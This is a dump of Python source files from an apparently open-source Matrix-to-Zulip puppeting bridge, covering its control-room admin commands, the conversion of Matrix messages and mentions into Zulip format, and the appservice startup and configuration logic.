self.mx_register("m.room.message", self.on_mx_message)
def is_valid(self) -> bool:
if self.user_id is None:
return False
if len(self.members) != 2:
return False
return True
async def show_help(self):
self.send_notice_html(
f"<b>Howdy, stranger!</b> You have been granted access to the Zulip bridge of <b>{self.serv.server_name}</b>."
)
try:
return await self.commands.trigger("HELP")
except CommandParserError as e:
return self.send_notice(str(e))
async def on_mx_message(self, event: "MessageEvent") -> bool:
if str(event.content.msgtype) != "m.text" or event.sender == self.serv.user_id:
return
# ignore edits
if event.content.get_edit():
return
try:
lines = event.content.body.split("\n")
command = lines.pop(0)
tail = "\n".join(lines) if len(lines) > 0 else None
await self.commands.trigger(command, tail)
except CommandParserError as e:
self.send_notice(str(e))
def organizations(self):
organizations = {}
for organization, config in self.serv.config["organizations"].items():
config["name"] = organization
organizations[organization.lower()] = config
return organizations
async def cmd_masks(self, args):
msg = "Configured masks:\n"
for mask, value in self.serv.config["allow"].items():
msg += "\t{} -> {}\n".format(mask, value)
self.send_notice(msg)
async def cmd_addmask(self, args):
masks = self.serv.config["allow"]
if args.mask in masks:
return self.send_notice("Mask already exists")
masks[args.mask] = "admin" if args.admin else "user"
await self.serv.save()
self.send_notice("Mask added.")
async def cmd_delmask(self, args):
masks = self.serv.config["allow"]
if args.mask not in masks:
return self.send_notice("Mask does not exist")
del masks[args.mask]
await self.serv.save()
self.send_notice("Mask removed.")
async def cmd_organizations(self, args):
organizations: dict["OrganizationRoom", dict] = self.serv.config[
"organizations"
]
self.send_notice("Configured organizations:")
for _, data in organizations.items():
self.send_notice(f"\t{data}")
async def cmd_addorganization(self, args):
organizations = self.organizations()
if args.name.lower() in organizations:
return self.send_notice("Organization with that name already exists")
self.serv.config["organizations"][args.name] = {
"name": args.name,
}
await self.serv.save()
self.send_notice("Organization added.")
async def cmd_delorganization(self, args):
organizations = self.organizations()
if args.name.lower() not in organizations:
return self.send_notice("Organization does not exist")
del self.serv.config["organizations"][args.name.lower()]
await self.serv.save()
return self.send_notice("Organization removed.")
async def cmd_status(self, _args):
users = set()
response = ""
if self.serv.is_admin(self.user_id):
for room in self.serv.find_rooms():
if not room.user_id:
continue
users.add(room.user_id)
users = list(users)
users.sort()
else:
users.add(self.user_id)
response += f"I have {len(users)} known users:"
for user_id in users:
ncontrol = len(self.serv.find_rooms("ControlRoom", user_id))
response += f"<br>{indent(1)}{user_id} ({ncontrol} open control rooms):"
for organization in self.serv.find_rooms("OrganizationRoom", user_id):
connected = "not connected"
stream = "no streams"
direct = "no DMs"
if organization.zulip and organization.zulip.has_connected:
connected = f"connected to {organization.site}"
nstream = 0
ndirect = len(organization.direct_rooms)
for room in organization.rooms.values():
if type(room).__name__ == "StreamRoom":
nstream += 1
if nstream > 0:
stream = f"{nstream} streams"
if ndirect > 0:
direct = f"{ndirect} DMs"
response += f"<br>{indent(2)}{organization.name}, {connected}, {stream}, {direct}"
self.send_notice_html(response)
async def cmd_forget(self, args):
if args.user == self.user_id:
return self.send_notice("I can't forget you, silly!")
rooms = self.serv.find_rooms(None, args.user)
if len(rooms) == 0:
return self.send_notice("No such user. See STATUS for list of users.")
# disconnect each organization room in first pass
for room in rooms:
if type(room) == OrganizationRoom and room.conn and room.conn.connected:
self.send_notice(f"Disconnecting {args.user} from {room.name}...")
await room.cmd_disconnect(Namespace())
self.send_notice(f"Leaving all {len(rooms)} rooms {args.user} was in...")
# then just forget everything
for room in rooms:
self.serv.unregister_room(room.id)
try:
await self.az.intent.leave_room(room.id)
except MatrixRequestError:
pass
try:
await self.az.intent.forget_room(room.id)
except MatrixRequestError:
pass
self.send_notice(f"Done, I have forgotten about {args.user}")
async def cmd_displayname(self, args):
try:
await self.az.intent.set_displayname(args.displayname)
except MatrixRequestError as e:
self.send_notice(f"Failed to set displayname: {str(e)}")
async def cmd_avatar(self, args):
try:
await self.az.intent.set_avatar_url(args.url)
except MatrixRequestError as e:
self.send_notice(f"Failed to set avatar: {str(e)}")
async def cmd_ident(self, args):
idents = self.serv.config["idents"]
if args.cmd == "list" or args.cmd is None:
self.send_notice("Configured custom idents:")
for mxid, ident in idents.items():
self.send_notice(f"\t{mxid} -> {ident}")
elif args.cmd == "set":
if not re.match(r"^[a-z][-a-z0-9]*$", args.ident):
self.send_notice(f"Invalid ident string: {args.ident}")
self.send_notice(
"Must be lowercase, start with a letter, can contain dashes, letters and numbers."
)
else:
idents[args.mxid] = args.ident
self.send_notice(f"Set custom ident for {args.mxid} to {args.ident}")
await self.serv.save()
elif args.cmd == "remove":
if args.mxid in idents:
del idents[args.mxid]
self.send_notice(f"Removed custom ident for {args.mxid}")
await self.serv.save()
else:
self.send_notice(f"No custom ident for {args.mxid}")
async def cmd_sync(self, args):
if args.lazy:
self.serv.config["member_sync"] = "lazy"
await self.serv.save()
elif args.half:
self.serv.config["member_sync"] = "half"
await self.serv.save()
elif args.full:
self.serv.config["member_sync"] = "full"
await self.serv.save()
self.send_notice(f"Member sync is set to {self.serv.config['member_sync']}")
async def cmd_media_url(self, args):
if args.remove:
self.serv.config["media_url"] = None
await self.serv.save()
self.serv.endpoint = await self.serv.detect_public_endpoint()
elif args.url:
parsed = urlparse(args.url)
if (
parsed.scheme in ["http", "https"]
and not parsed.params
and not parsed.query
and not parsed.fragment
):
self.serv.config["media_url"] = args.url
await self.serv.save()
self.serv.endpoint = args.url
else:
self.send_notice(f"Invalid media URL format: {args.url}")
return
self.send_notice(
f"Media URL override is set to {self.serv.config['media_url']}"
)
self.send_notice(f"Current active media URL: {self.serv.endpoint}")
async def cmd_media_path(self, args):
if args.remove:
self.serv.config["media_path"] = None
await self.serv.save()
self.serv.media_path = self.serv.DEFAULT_MEDIA_PATH
elif args.path:
self.serv.config["media_path"] = args.path
await self.serv.save()
self.serv.media_path = args.path
self.send_notice(
f"Media Path override is set to {self.serv.config['media_path']}"
)
self.send_notice(f"Current active media path: {self.serv.media_path}")
async def cmd_open(self, args):
organizations = self.organizations()
name = args.name.lower()
if name not in organizations:
return self.send_notice("Organization does not exist")
organization = organizations[name]
found = 0
for room in self.serv.find_rooms(OrganizationRoom, self.user_id):
if room.name == organization["name"]:
found += 1
if not args.new:
if self.user_id not in room.members:
self.send_notice(f"Inviting back to {room.name} ({room.id})")
await self.az.intent.invite_user(room.id, self.user_id)
else:
self.send_notice(f"You are already in {room.name} ({room.id})")
# if we found at least one organization room, no need to create unless forced
if found > 0 and not args.new:
return
name = (
organization["name"]
if found == 0
else f"{organization['name']} {found + 1}"
)
self.send_notice(f"You have been invited to {name}")
await OrganizationRoom.create(self.serv, organization, self.user_id, name)
async def cmd_quit(self, args):
rooms = self.serv.find_rooms(None, self.user_id)
# disconnect each organization room in first pass
for room in rooms:
if (
type(room) == OrganizationRoom
and room.zulip
and room.zulip.has_connected
):
self.send_notice(f"Disconnecting from {room.name}...")
await room.cmd_disconnect(Namespace())
self.send_notice("Closing all channels and private messages...")
# then just forget everything
for room in rooms:
if room.id == self.id:
continue
self.serv.unregister_room(room.id)
try:
await self.az.intent.leave_room(room.id)
except MatrixRequestError:
pass
try:
await self.az.intent.forget_room(room.id)
except MatrixRequestError:
pass
async def cmd_version(self, args):
self.send_notice(f"zulipbridge v{__version__}")
async def cmd_personalroom(self, args) -> None:
organization = None
for room in self.serv.find_rooms():
if not isinstance(room, OrganizationRoom):
continue
if room.name.lower() == args.organization:
organization = room
break
if not organization:
# TODO: Add permissions for creating a personal room
self.send_notice(
"Could not find an organization with that name or you don't have permissions"
)
return
await PersonalRoom.create(organization, self.user_id)
self.send_notice("Personal room created")
def indent(n):
return " " * n * 8
| 19,552 | Python | .py | 435 | 33.110345 | 130 | 0.586766 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,578 | under_organization_room.py | GearKite_MatrixZulipBridge/matrixzulipbridge/under_organization_room.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
import asyncio
import logging
from typing import TYPE_CHECKING, Optional
from urllib.parse import quote, urlparse
from bs4 import BeautifulSoup
from markdownify import markdownify
from mautrix.errors import MatrixStandardRequestError
from mautrix.types.event.state import (
JoinRestriction,
JoinRestrictionType,
JoinRule,
JoinRulesStateEventContent,
)
from mautrix.types.event.type import EventType
from matrixzulipbridge.room import InvalidConfigError, Room
if TYPE_CHECKING:
from mautrix.types import MessageEvent, RoomID, UserID
from matrixzulipbridge.organization_room import OrganizationRoom
def connected(f):
def wrapper(*args, **kwargs):
self = args[0]
if not self.organization.zulip or not self.organization.zulip.has_connected:
self.send_notice("Need to be connected to use this command.")
return asyncio.sleep(0)
return f(*args, **kwargs)
return wrapper
class UnderOrganizationRoom(Room):
"""Base class for all rooms under an organization"""
organization: Optional["OrganizationRoom"]
organization_id: "RoomID"
force_forward: bool
def init(self) -> None:
self.organization = None
self.organization_id = None
self.force_forward = True
def from_config(self, config: dict) -> None:
super().from_config(config)
self.organization_id = config["organization_id"]
if not self.organization_id:
raise InvalidConfigError("No organization_id in config for room")
def to_config(self) -> dict:
return {
**(super().to_config()),
"organization_id": self.organization_id,
}
def is_valid(self) -> bool:
if self.organization_id is None:
return False
return True
async def join_existing_room(self, room_id: "RoomID"):
self.id = await self.organization.az.intent.join_room(room_id)
if self.id is None:
self.organization.send_notice(f"Could not join room {room_id}")
return
self.serv.register_room(self)
await self.save()
# start event queue now that we have an id
self._queue.start()
# attach to organization space
if self.organization.space:
await self.organization.space.attach(self.id)
async def _process_event_content(
self,
event: "MessageEvent",
prefix: str = "",
reply_to=None,
topic: str = None,
):
content = event.content
if content.msgtype.is_media:
media_url = self.serv.mxc_to_url(
mxc=event.content.url, filename=event.content.body
)
message = f"[{content.body}]({media_url})"
elif content.formatted_body:
message = content.formatted_body
# Replace all puppet mentions with Zulip mentions
soup = BeautifulSoup(content.formatted_body, features="html.parser")
for link in soup.find_all("a"):
href: str = link.get("href", "")
if not href.startswith("https://matrix.to/#/"):
continue
mxid = href.split("https://matrix.to/#/")[1]
# Translate puppet mentions as native Zulip mentions
if not self.serv.is_puppet(mxid):
continue
user_id = self.organization.get_zulip_user_id_from_mxid(mxid)
zulip_user = self.organization.get_zulip_user(user_id)
zulip_mention = soup.new_tag("span")
zulip_mention.string = " @"
zulip_mention_content = soup.new_tag("strong")
zulip_mention_content.string = f"{zulip_user['full_name']}|{user_id}"
zulip_mention.append(zulip_mention_content)
link.replace_with(zulip_mention)
if reply_to is not None:
# Attempt to parse reply, it's alright if this fails
try:
reply_block = soup.find("mx-reply")
if reply_block is not None:
links = reply_block.find_all("a")
if type(self).__name__ in (
"DirectRoom",
"StreamRoom",
):
# Replace reply event link with Zulip link
in_reply_to_link = links[0]
narrow = self._construct_zulip_narrow_url(
topic=topic,
message_id=self.messages.inv.get(reply_to.event_id),
)
in_reply_to_link["href"] = narrow
# Replace mxid with display name (non-puppet users)
if len(links) > 1:
author_link = links[1]
author_mxid = author_link["href"].split(
"https://matrix.to/#/"
)[1]
author_link.string.replace_with(
self._get_displayname(author_mxid)
)
except Exception: # pylint: disable=broad-exception-caught
pass
message = soup.encode(formatter="html5")
message = markdownify(message)
elif content.body:
message = content.body
else:
logging.warning("_process_event_content called with no usable body")
return
message = prefix + message
return message
def _get_displayname(self, mxid: "UserID"):
if mxid in self.displaynames:
sender_displayname = self.displaynames[mxid][:100]
return sender_displayname
# Fallback to mxid
return mxid
def _construct_zulip_narrow_url(self, topic=None, message_id=None):
zulip_uri = urlparse(self.organization.zulip.base_url)
base_url = zulip_uri.scheme + "://" + zulip_uri.netloc
narrow = base_url + "/#narrow"
if type(self).__name__ == "DirectRoom":
recipients_string = ""
for recipient in set(self.recipient_ids):
recipients_string += str(recipient) + ","
recipients_string = recipients_string[:-1]
narrow += f"/dm/{recipients_string}"
elif type(self).__name__ == "StreamRoom":
narrow += f"/stream/{self.stream_id}"
if topic is not None:
narrow += f"/topic/{quote(topic, safe='')}"
if message_id is not None:
narrow += f"/near/{message_id}"
return narrow
async def _attach_space_internal(self) -> None:
await self.az.intent.send_state_event(
self.id,
EventType.ROOM_JOIN_RULES, # Why does this happend? pylint: disable=no-member
content=JoinRulesStateEventContent(
join_rule=JoinRule.RESTRICTED,
allow=[
JoinRestriction(
type=JoinRestrictionType.ROOM_MEMBERSHIP,
room_id=self.organization.space.id,
),
],
),
)
async def _attach_space(self) -> None:
logging.debug(
f"Attaching room {self.id} to organization space {self.organization.space.id}."
)
try:
room_create = await self.az.intent.get_state_event(
self.id, EventType.ROOM_CREATE # pylint: disable=no-member
) # pylint: disable=no-member
if room_create.room_version in [str(v) for v in range(1, 9)]:
self.send_notice(
"Only rooms of version 9 or greater can be attached to a space."
)
self.send_notice(
"Leave and re-create the room to ensure the correct version."
)
return
await self._attach_space_internal()
self.send_notice("Attached to space.")
except MatrixStandardRequestError as e:
logging.debug("Setting join_rules for space failed.", exc_info=True)
self.send_notice(f"Failed attaching space: {e.message}")
self.send_notice("Make sure the room is at least version 9.")
except Exception:
logging.exception(
f"Failed to attach {self.id} to space {self.organization.space.id}."
)
| 9,566 | Python | .py | 217 | 32.235023 | 95 | 0.58687 | GearKite/MatrixZulipBridge | 8 | 1 | 3 | AGPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,579 | __main__.py | GearKite_MatrixZulipBridge/matrixzulipbridge/__main__.py | # MatrixZulipBridge - an appservice puppeting bridge for Matrix - Zulip
#
# Copyright (C) 2024 Emma Meijere <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Originally licensed under the MIT (Expat) license:
# <https://github.com/hifi/heisenbridge/blob/2532905f13835762870de55ba8a404fad6d62d81/LICENSE>.
#
# [This file includes modifications made by Emma Meijere]
#
#
import argparse
import asyncio
import grp
import logging
import os
import pwd
import random
import re
import string
import sys
import urllib
from fnmatch import fnmatch
from typing import TYPE_CHECKING, Optional
from mautrix.api import HTTPAPI, Method, Path, SynapseAdminPath
from mautrix.appservice import AppService as MauService
from mautrix.appservice.state_store import ASStateStore
from mautrix.client.state_store.memory import MemoryStateStore
from mautrix.errors import (
MatrixConnectionError,
MatrixRequestError,
MForbidden,
MNotFound,
MUserInUse,
)
from mautrix.types import Membership
from mautrix.util.bridge_state import BridgeState, BridgeStateEvent
from mautrix.util.config import yaml
from matrixzulipbridge import __version__
from matrixzulipbridge.appservice import AppService
from matrixzulipbridge.control_room import ControlRoom
from matrixzulipbridge.direct_room import DirectRoom
from matrixzulipbridge.organization_room import OrganizationRoom
from matrixzulipbridge.personal_room import PersonalRoom
from matrixzulipbridge.room import Room, RoomInvalidError
from matrixzulipbridge.space_room import SpaceRoom
from matrixzulipbridge.stream_room import StreamRoom
from matrixzulipbridge.websocket import AppserviceWebsocket
try: # Optionally load coloredlogs
import coloredlogs
except ModuleNotFoundError:
pass
if TYPE_CHECKING:
from mautrix.types import Event, RoomID, UserID
from matrixzulipbridge.types import ZulipUserID
class MemoryBridgeStateStore(ASStateStore, MemoryStateStore):
def __init__(self) -> None:
ASStateStore.__init__(self)
MemoryStateStore.__init__(self)
class BridgeAppService(AppService):
_api: HTTPAPI
_rooms: dict[str, Room]
_users: dict[str, str]
DEFAULT_MEDIA_PATH = "/_matrix/media/v3/download/{netloc}{path}{filename}"
registration: Optional[dict]
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.registration = None
self.puppet_separator = None
self.puppet_prefix = None
self.api = None
self.synapse_admin = None
self.endpoint = None
async def push_bridge_state(
self,
state_event: BridgeStateEvent,
error=None,
message=None,
ttl=None,
remote_id=None,
) -> None:
if (
"zulipbridge" not in self.registration
or "status_endpoint" not in self.registration["zulipbridge"]
):
return
state = BridgeState(
state_event=state_event,
error=error,
message=message,
ttl=ttl,
remote_id=remote_id,
)
logging.debug(f"Updating bridge state {state}")
await state.send(
self.registration["zulipbridge"]["status_endpoint"],
self.az.as_token,
log=logging,
)
def register_room(self, room: Room):
self._rooms[room.id] = room
def unregister_room(self, room_id: "RoomID"):
if room_id in self._rooms:
del self._rooms[room_id]
# this is mostly used by organization rooms at init, it's a bit slow
def find_rooms(
self, rtype=None, user_id: "UserID" = None, organization_id: "RoomID" = None
) -> list[Room]:
ret = []
if rtype is not None and not isinstance(rtype, str):
rtype = rtype.__name__
for room in self._rooms.values():
if (
(rtype is None or room.__class__.__name__ == rtype)
and (user_id is None or room.user_id == user_id)
and (organization_id is None or room.organization_id == organization_id)
):
ret.append(room)
return ret
def is_admin(self, user_id: "UserID"):
if user_id == self.config["owner"]:
return True
for mask, value in self.config["allow"].items():
if fnmatch(user_id, mask) and value == "admin":
return True
return False
def is_user(self, user_id: "UserID"):
if self.is_admin(user_id):
return True
for mask in self.config["allow"].keys():
if fnmatch(user_id, mask):
return True
return False
def is_local(self, mxid: "UserID"):
return mxid.endswith(":" + self.server_name)
def is_puppet(self, mxid: "UserID") -> bool:
"""Checks whether a given MXID is our puppet
Args:
mxid (str): Matrix user ID
Returns:
bool:
"""
return mxid.startswith("@" + self.puppet_prefix) and self.is_local(mxid)
def get_mxid_from_zulip_user_id(
self,
organization: "OrganizationRoom",
zulip_user_id: "ZulipUserID",
at=True,
server=True,
) -> "UserID":
ret = re.sub(
r"[^0-9a-z\-\.=\_/]",
lambda m: "=" + m.group(0).encode("utf-8").hex(),
f"{self.puppet_prefix}{organization.name}{self.puppet_separator}{zulip_user_id}".lower(),
)
# ret = f"{self.puppet_prefix}{organization.site}{self.puppet_separator}{zulip_user_id}".lower()
if at:
ret = "@" + ret
if server:
ret += ":" + self.server_name
return ret
async def cache_user(self, user_id: "UserID", displayname: str):
# start by caching that the user_id exists without a displayname
if user_id not in self._users:
self._users[user_id] = None
# if the cached displayname is incorrect
if displayname and self._users[user_id] != displayname:
try:
await self.az.intent.user(user_id).set_displayname(displayname)
self._users[user_id] = displayname
except MatrixRequestError as e:
logging.warning(
f"Failed to set displayname '{displayname}' for user_id '{user_id}', got '{e}'"
)
def is_user_cached(self, user_id: "UserID", displayname: str = None):
return user_id in self._users and (
displayname is None or self._users[user_id] == displayname
)
async def ensure_zulip_user_id(
self,
organization: "OrganizationRoom",
zulip_user_id: "ZulipUserID" = None,
update_cache=True,
zulip_user: dict = None,
):
if zulip_user_id is None:
zulip_user_id = zulip_user["user_id"]
mx_user_id = self.get_mxid_from_zulip_user_id(organization, zulip_user_id)
# if we've seen this user before, we can skip registering
if not self.is_user_cached(mx_user_id):
await self.az.intent.user(mx_user_id).ensure_registered()
# always ensure the displayname is up-to-date
if update_cache:
zulip_user = organization.get_zulip_user(zulip_user_id)
await self.cache_user(mx_user_id, zulip_user["full_name"])
return mx_user_id
async def _on_mx_event(self, event: "Event"):
if event.room_id and event.room_id in self._rooms:
try:
room = self._rooms[event.room_id]
await room.on_mx_event(event)
except RoomInvalidError:
logging.info(
f"Event handler for {event.type} threw RoomInvalidError, leaving and cleaning up."
)
self.unregister_room(room.id)
room.cleanup()
await self.leave_room(room.id, room.members)
except Exception:
logging.exception(
"Ignoring exception from room handler. This should be fixed."
)
elif (
str(event.type) == "m.room.member"
and event.sender != self.user_id
and event.content.membership == Membership.INVITE
):
# set owner if we have none and the user is from the same HS
if self.config.get("owner", None) is None and event.sender.endswith(
":" + self.server_name
):
logging.info(f"We have an owner now, let us rejoice, {event.sender}!")
self.config["owner"] = event.sender
await self.save()
if not self.is_user(event.sender):
logging.info(
f"Non-whitelisted user {event.sender} tried to invite us, ignoring."
)
return
else:
logging.info(f"Got an invite from {event.sender}")
if not event.content.is_direct:
logging.debug("Got an invite to non-direct room, ignoring")
return
# only respond to invites unknown new rooms
if event.room_id in self._rooms:
logging.debug("Got an invite to room we're already in, ignoring")
return
# handle invites against puppets
if event.state_key != self.user_id:
logging.info(
f"Whitelisted user {event.sender} invited {event.state_key}, going to reject."
)
try:
await self.az.intent.user(event.state_key).kick_user(
event.room_id,
event.state_key,
"Will invite YOU instead",
)
except Exception:
logging.exception("Failed to reject invitation.")
raise NotImplementedError(
"Puppet invites as profile query"
) #:TODO: implement
for room in self.find_rooms(OrganizationRoom, event.sender):
pass
return
logging.info(
f"Whitelisted user {event.sender} invited us, going to accept."
)
# accept invite sequence
try:
room = ControlRoom(
id=event.room_id,
user_id=event.sender,
serv=self,
members=[event.sender],
bans=[],
)
await room.save()
self.register_room(room)
await self.az.intent.join_room(room.id)
# show help on open
await room.show_help()
except Exception:
if event.room_id in self._rooms:
del self._rooms[event.room_id]
logging.exception("Failed to create control room.")
else:
pass
async def detect_public_endpoint(self):
async with self.api.session as session:
# first try https well-known
try:
resp = await session.request(
"GET",
f"https://{self.server_name}/.well-known/matrix/client",
)
data = await resp.json(content_type=None)
return data["m.homeserver"]["base_url"]
except Exception:
logging.debug("Did not find .well-known for HS")
# try https directly
try:
resp = await session.request(
"GET", f"https://{self.server_name}/_matrix/client/versions"
)
await resp.json(content_type=None)
return f"https://{self.server_name}"
except Exception:
logging.debug("Could not use direct connection to HS")
# give up
logging.warning(
"Using internal URL for homeserver, media links are likely broken!"
)
return str(self.api.base_url)
def mxc_to_url(self, mxc: str, filename: str = None):
mxc = urllib.parse.urlparse(mxc)
if filename is None:
filename = ""
else:
filename = "/" + urllib.parse.quote(filename)
media_path = self.media_path.format(
netloc=mxc.netloc, path=mxc.path, filename=filename
)
return self.endpoint + media_path
async def reset(self, config_file, homeserver_url):
with open(config_file, encoding="utf-8") as f:
registration = yaml.load(f)
api = HTTPAPI(base_url=homeserver_url, token=registration["as_token"])
whoami = await api.request(Method.GET, Path.v3.account.whoami)
self.user_id = whoami["user_id"]
self.server_name = self.user_id.split(":", 1)[1]
logging.info("We are " + whoami["user_id"])
self.az = MauService(
id=registration["id"],
domain=self.server_name,
server=homeserver_url,
as_token=registration["as_token"],
hs_token=registration["hs_token"],
bot_localpart=registration["sender_localpart"],
state_store=MemoryBridgeStateStore(),
)
try:
await self.az.start(host="127.0.0.1", port=None)
except Exception:
logging.exception("Failed to listen.")
return
joined_rooms = await self.az.intent.get_joined_rooms()
logging.info(f"Leaving from {len(joined_rooms)} rooms...")
for room_id in joined_rooms:
logging.info(f"Leaving from {room_id}...")
await self.leave_room(room_id, None)
logging.info("Resetting configuration...")
self.config = {}
await self.save()
logging.info("All done!")
def load_reg(self, config_file):
with open(config_file, encoding="utf-8") as f:
self.registration = yaml.load(f)
async def leave_room(self, room_id: "RoomID", members: list["UserID"]):
members = members if members else []
for member in members:
(name, server) = member.split(":", 1)
if name.startswith("@" + self.puppet_prefix) and server == self.server_name:
try:
await self.az.intent.user(member).leave_room(room_id)
except Exception:
logging.exception("Removing puppet on leave failed")
try:
await self.az.intent.leave_room(room_id)
except MatrixRequestError:
pass
try:
await self.az.intent.forget_room(room_id)
except MatrixRequestError:
pass
def _keepalive(self):
async def put_presence():
try:
await self.az.intent.set_presence(self.user_id)
except Exception:
pass
asyncio.ensure_future(put_presence())
asyncio.get_running_loop().call_later(60, self._keepalive)
async def run(
self, listen_address, listen_port, homeserver_url, owner, unsafe_mode
):
if "sender_localpart" not in self.registration:
logging.critical("Missing sender_localpart from registration file.")
sys.exit(1)
if (
"namespaces" not in self.registration
or "users" not in self.registration["namespaces"]
):
logging.critical("User namespaces missing from registration file.")
sys.exit(1)
# remove self namespace if exists
ns_users = [
x
for x in self.registration["namespaces"]["users"]
if x["regex"].split(":")[0] != f"@{self.registration['sender_localpart']}"
]
if len(ns_users) != 1:
logging.critical(
"A single user namespace is required for puppets in the registration file."
)
sys.exit(1)
if "exclusive" not in ns_users[0] or not ns_users[0]["exclusive"]:
logging.critical("User namespace must be exclusive.")
sys.exit(1)
m = re.match(r"^@(.+)([\_/])\.[\*\+]:?", ns_users[0]["regex"])
if not m:
logging.critical(
"User namespace regex must be an exact prefix like '@zulip_bridge_.*' that includes the separator character (_ or /)."
)
sys.exit(1)
self.puppet_separator = m.group(2)
self.puppet_prefix = m.group(1) + self.puppet_separator
logging.info(f"zulipbridge v{__version__}")
if unsafe_mode:
logging.warning("Running in unsafe mode, bridge may leave rooms on error")
url = urllib.parse.urlparse(homeserver_url)
ws = None
if url.scheme in ["ws", "wss"]:
logging.info(
f"Using websockets to receive transactions. Listening is still enabled on http://{listen_address}:{listen_port}"
)
ws = AppserviceWebsocket(
homeserver_url, self.registration["as_token"], self._on_mx_event
)
homeserver_url = url._replace(
scheme=("https" if url.scheme == "wss" else "http")
).geturl()
logging.info(f"Connecting to HS at {homeserver_url}")
self.api = HTTPAPI(base_url=homeserver_url, token=self.registration["as_token"])
# conduit requires that the appservice user is registered before whoami
wait = 0
while True:
try:
await self.api.request(
Method.POST,
Path.v3.register,
{
"type": "m.login.application_service",
"username": self.registration["sender_localpart"],
},
)
logging.debug("Appservice user registration succeeded.")
break
except MUserInUse:
logging.debug("Appservice user is already registered.")
break
except MatrixConnectionError as e:
if wait < 30:
wait += 5
logging.warning(
f"Failed to connect to HS: {e}, retrying in {wait} seconds..."
)
await asyncio.sleep(wait)
except Exception:
logging.exception(
"Unexpected failure when registering appservice user."
)
sys.exit(1)
# mautrix migration requires us to call whoami manually at this point
whoami = await self.api.request(Method.GET, Path.v3.account.whoami)
logging.info("We are %s", whoami["user_id"])
self.user_id = whoami["user_id"]
self.server_name = self.user_id.split(":", 1)[1]
self.az = MauService(
id=self.registration["id"],
domain=self.server_name,
server=homeserver_url,
as_token=self.registration["as_token"],
hs_token=self.registration["hs_token"],
bot_localpart=self.registration["sender_localpart"],
state_store=MemoryBridgeStateStore(),
)
self.az.matrix_event_handler(self._on_mx_event)
try:
await self.az.start(host=listen_address, port=listen_port)
except Exception:
logging.exception("Failed to listen.")
sys.exit(1)
try:
await self.az.intent.ensure_registered()
logging.debug("Appservice user exists at least now.")
except Exception:
logging.exception("Unexpected failure when registering appservice user.")
sys.exit(1)
if (
"zulipbridge" in self.registration
and "displayname" in self.registration["zulipbridge"]
):
try:
logging.debug(
f"Overriding displayname from registration file to {self.registration['zulipbridge']['displayname']}"
)
await self.az.intent.set_displayname(
self.registration["zulipbridge"]["displayname"]
)
except MatrixRequestError as e:
logging.warning(f"Failed to set displayname: {str(e)}")
self._rooms = {}
self._users = {}
self.config = {
"organizations": {},
"owner": None,
"member_sync": "half",
"media_url": None,
"media_path": None,
"namespace": self.puppet_prefix,
"allow": {},
}
logging.debug(f"Default config: {self.config}")
self.synapse_admin = False
try:
is_admin = await self.api.request(
Method.GET, SynapseAdminPath.v1.users[self.user_id].admin
)
self.synapse_admin = is_admin["admin"]
except MForbidden:
logging.info(
f"We ({self.user_id}) are not a server admin, inviting puppets is required."
)
except Exception:
logging.info(
"Seems we are not connected to Synapse, inviting puppets is required."
)
# load config from HS
await self.load()
async def _resolve_media_endpoint():
endpoint = await self.detect_public_endpoint()
# only rewrite it if it wasn't changed
if self.endpoint == str(self.api.base_url):
self.endpoint = endpoint
logging.info("Homeserver is publicly available at " + self.endpoint)
# use configured media_url for endpoint if we have it
if (
"zulipbridge" in self.registration
and "media_url" in self.registration["zulipbridge"]
):
logging.debug(
f"Overriding media URL from registration file to {self.registration['zulipbridge']['media_url']}"
)
self.endpoint = self.registration["zulipbridge"]["media_url"]
elif self.config["media_url"]:
self.endpoint = self.config["media_url"]
else:
logging.info(
"Trying to detect homeserver public endpoint, this might take a while..."
)
self.endpoint = str(self.api.base_url)
asyncio.ensure_future(_resolve_media_endpoint())
# use configured media_path for media_path if we have it
if (
"zulipbridge" in self.registration
and "media_path" in self.registration["zulipbridge"]
):
logging.debug(
f"Overriding media path from registration file to {self.registration['zulipbridge']['media_path']}"
)
self.media_path = self.registration["zulipbridge"]["media_path"]
elif self.config["media_path"]:
self.media_path = self.config["media_path"]
else:
self.media_path = self.DEFAULT_MEDIA_PATH
logging.info("Starting presence loop")
self._keepalive()
# prevent starting bridge with changed namespace
if self.config["namespace"] != self.puppet_prefix:
logging.error(
f"Previously used namespace '{self.config['namespace']}' does not match current '{self.puppet_prefix}'."
)
sys.exit(1)
# honor command line owner
if owner is not None and self.config["owner"] != owner:
logging.info(f"Overriding loaded owner with '{owner}'")
self.config["owner"] = owner
# always ensure our merged and migrated configuration is up-to-date
await self.save()
logging.info("Fetching joined rooms...")
joined_rooms = await self.az.intent.get_joined_rooms()
logging.debug(f"Appservice rooms: {joined_rooms}")
logging.info(f"Bridge is in {len(joined_rooms)} rooms, initializing them...")
Room.init_class(self.az)
# room types and their init order, organization must be before chat and group
room_types = [
ControlRoom,
OrganizationRoom,
DirectRoom,
StreamRoom,
PersonalRoom,
SpaceRoom,
]
room_type_map = {}
for room_type in room_types:
room_type.init_class(self.az)
room_type_map[room_type.__name__] = room_type
# we always auto-open control room for owner
owner_control_open = False
